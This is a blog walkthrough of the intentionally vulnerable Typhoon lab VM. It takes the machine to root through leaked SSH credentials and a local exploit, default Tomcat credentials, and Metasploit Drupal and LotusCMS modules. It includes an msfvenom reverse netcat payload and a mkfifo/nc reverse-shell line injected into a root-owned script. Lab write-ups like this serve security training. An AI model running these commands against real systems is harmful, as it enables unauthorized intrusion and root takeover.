Typhoon VM contains several vulnerabilities and
configuration errors. Typhoon can be used to test vulnerabilities in network
services, configuration errors, vulnerable web applications, password cracking
attacks, privilege escalation attacks, post exploitation steps, information
gathering and DNS attacks. Prisma trainings involve practical use of Typhoon.
Flag:
root-flag
Since
there are multiple ways in which we can exploit this machine. Therefore we have
used two methods to capture the flag as follows:
Method 1- Using a LOCAL PRIVILEGE
ESCALATION SHELL after logging into SSH.
Let’s
Begin with the Walkthrough!!
Let’s
start off with scanning the network to find our targets IP.
netdiscover
Our next motive is to scan the target IP with nmap.
nmap -A 192.168.1.101
The NMAP output shows various open ports: 21(ftp), 22(ssh), 25(smtp), 53(domain), 80(http), 110(pop3), 111(rpcbind), 139(netbios-ssn), 143(imap), 445(netbios-ssn), 631(ipp), 993(ssl/imaps), 995(ssl/pop3), 2049(nfs_acl), 3306(mysql), 5432(postgrespl), 8080(http).
Further we notice that there is a entry /monoadmin/ in robot.txt as it might be useful.
We also noticed that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. This
could be another way of exploiting this machine. But will see to it later on.
Moving on, Since
port 80 is also open. So, we browsed the found directory /mongoadmin/ into the browser. The result displayed is shown in the
image. Here we set change database to credentials(84mb).
It will display a link of 2 Credentials.
Click on it.
Clicking on the 2 Credential link will give us 2
Credentials [username]:typhoon and [password]:789456123 . These credentials
might be a great help for further enumeration.
After a sometime,
we just strike with a idea WHY NOT USE
THE FOUND CREDS TO LOGIN WITH SSH?. Since SSH port 22 is also open.
Than we simply
logged in SSH with CREDENTIALS Username:typhoon
& Password: 789456123
ssh typhoon@192.168.1.101
Then we checked
system information and found out Ubuntu
14.04 is running on target machine.
Good thing we were familiar with an exploit
for Ubuntu 14.04.
Next we look for
an exploit for ubuntu 14.04 using searchsploit. The exploit we have used
have highlighted, after that we have copied the exploit 37292.c in the /root/
directory. Executing a Python server to download the file in the target
machine.
Afterwards we
have downloaded our exploit 37292.c
in the /tmp directory. After
compilation and granting permissions to the exploit. We have executed it.
Booyeah!!
We have got the root access and found our FLAG. We take a
look at the content of the file and greeted with a congratulatory message.
Method 2
Using Tomcat Manager Upload to get
the meterpreter and then further establishing a reverse connection to get root
access.
Let’s
Begin with the Walkthrough!!
Since
in Method-1 port scanning, we notice that port 8080 is open for Apache Tomcat/ Coyote JSP Engine 1.1. So let’s
browse the Target IP on port 8080 on the browser.
We are very fimiliar
with Tomcat Server Login using manager webapp due to our previous lab
experiences. Without wasting time we straight away logged into Tomcat Server using Metasploits Tomcat Manager using the Default
credentials for Tomcat Server Login.
[username]:tomcat
[password]:tomcat
Oh Yeah! We have
got the meterpreter. After spending a lot of time of enumeration, we found a directory /tab which consist of file script.sh that was owned by root
and has FULL Permission. So we thought of inserting a malicious code in
script.sh.
Moving on!!
We need to create a bash code using Msfvenom:
msfvenom –p cmd/unix/reverse_netcat
lhost=192.168.1.109 lport=1234 R
After that, append the above
generated malicious code in the script.sh file.
echo “mkfifo /tmp/vvwjo; nc 192.168.1.109 1234
0
Since the malicious code got
executed with the script.sh file.
Therefore we got a reverse shell on our netcat listener.
Yeah!! We have got the
root access and found root-flag. We
take a look at the content of the file and greeted with a congratulatory
message.
3rd
Method:Exploiting Drupal CMS
Unfortunately on exploring port 80 we didn’t observe any
remarkable things, therefore, we try to enumerate web directory with the help
of Dirb tool.
dirb
http://192.168.1.101
It was wonderful to
observe that there was two CMS as
highlighted in the below image.
On exploring /Drupal in the web browser, it put up the
following web page which was associated to Drupal cms.
Without wasting must time, we
chase towards metasploit and run following module to exploit Drupal cms.
use
exploit/unix/webapp/drupal_drupalgeddon2
msf
exploit(/unix/webapp/drupal_drupalgeddon2) > set rhost 192.168.1.101
msf
exploit(/unix/webapp/drupal_drupalgeddon2) > set targeturi /drupal
msf
exploit(/unix/webapp/drupal_drupalgeddon2) > exploit
Booom!! It was terrific moment to
see meterpreter session of the target machine. Now for the post exploitation
you can follow above methodology which we have already discussed in 1st
method.
4th Method: Exploiting Lotus CMS
Scroll up and kindly notice the result which we have obtain
from the dirb scan, there we had found two CMS. We had already exploit Drupal,
now let’s go for next CMS and try to exploit it, if possible
So on exploring /cms in the web browser, it put up the following
web page which was associated to Lotus cms.
Without wasting must time, again we chase towards metasploit
and run following module to exploit lotus cms.
use exploit/multi/http/lcms_php_exec
msf exploit(multi/http/lcms_php_exec) > set rhost 192.168.1.101
msf exploit(multi/http/lcms_php_exec) > set uri /cms/
msf exploit(multi/http/lcms_php_exec) > exploit
Great, we have own another meterpreter session of the
target machine. Now for the post exploitation you can follow above methodology
which we have already discussed in 1st method.
0 comments:
Post a Comment